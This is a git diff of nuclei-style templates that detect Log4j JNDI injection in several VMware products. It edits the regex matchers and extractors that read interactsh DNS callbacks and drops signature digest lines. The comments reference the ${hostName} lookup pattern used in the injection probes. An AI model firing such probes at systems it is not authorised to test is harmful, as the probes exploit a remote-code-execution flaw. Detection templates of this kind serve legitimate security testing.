a/http/vulnerabilities/vmware/vmware-nsx-log4j.yaml +++ b/http/vulnerabilities/vmware/vmware-nsx-log4j.yaml @@ -50,20 +50,21 @@ http: - type: regex part: interactsh_request regex: - + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output extractors: - type: kval kval: - + - interactsh_ip # Print remote interaction IP in output - type: regex group: 2 regex: + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output part: interactsh_request - type: regex group: 1 regex: - part: interactsh_request -# digest: 4b0a00483046022100de5736c6ce7f7d3cde69a2e0b68dbcb3d44d75442ce8024f8e94ed882c22914b022100e671a3a611ebad279c50c74614df1051719b65144eacaca257ae7cec0689b162:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output + part: interactsh_request \ No newline at end of file diff --git a/http/vulnerabilities/vmware/vmware-operation-manager-log4j.yaml b/http/vulnerabilities/vmware/vmware-operation-manager-log4j.yaml index 1d45e46cbd..b6d731cdc7 100644 --- a/http/vulnerabilities/vmware/vmware-operation-manager-log4j.yaml +++ b/http/vulnerabilities/vmware/vmware-operation-manager-log4j.yaml @@ -53,20 +53,21 @@ http: - type: regex part: interactsh_request regex: - + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output extractors: - type: kval kval: - + - interactsh_ip # Print remote interaction IP in output - type: regex group: 2 regex: + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output part: interactsh_request - type: regex group: 1 regex: - part: interactsh_request -# digest: 490a0046304402203de29e9803f4ef5d0af4870eac8a7559cb0124cdcce62acecbc5d0f83cbc331402203de349240afecbda2e739f4191a4a5a6da4cf41935d45144331269006cfd2baf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output + part: interactsh_request \ No newline at end of file diff --git a/http/vulnerabilities/vmware/vmware-vcenter-log4j-jndi-rce.yaml b/http/vulnerabilities/vmware/vmware-vcenter-log4j-jndi-rce.yaml index 427a6b5c9d..df7e7dead1 100644 --- a/http/vulnerabilities/vmware/vmware-vcenter-log4j-jndi-rce.yaml +++ b/http/vulnerabilities/vmware/vmware-vcenter-log4j-jndi-rce.yaml @@ -46,5 +46,4 @@ http: group: 1 regex: - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${hostName} in output - part: interactsh_request -# digest: 490a0046304402207920ddfc8c0eb3d1df6bd2272ec73cd6463d4a06f8961a56a0cd9ed1de8aeb3e02202d3bc3a237cad422f7980e7374968252d9dc1f23aa56625989791f6d2bc50608:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + part: interactsh_request \ No newline at end of file diff --git a/http/vulnerabilities/vmware/vrealize-operations-log4j-rce.yaml b/http/vulnerabilities/vmware/vrealize-operations-log4j-rce.yaml index a79cb112aa..2c71e9c5b9 100644 --- a/http/vulnerabilities/vmware/vrealize-operations-log4j-rce.yaml +++ b/http/vulnerabilities/vmware/vrealize-operations-log4j-rce.yaml @@ -47,20 +47,21 @@ http: - type: regex part: interactsh_request regex: - + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output extractors: - type: kval kval: - + - interactsh_ip # Print remote interaction IP in output - type: regex group: 2 regex: + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output part: interactsh_request - type: regex group: 1 regex: - part: interactsh_request -# digest: 4a0a00473045022100aa7ea5068d17343a5be70930a9bb13dcb42a1e6ba099de3e3e69e3944aa40cf002204c515e1344683fe8623e77e52f70cf37eb4136152fc0cf05b832501e897d315f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output + part: interactsh_request \ No newline at end of file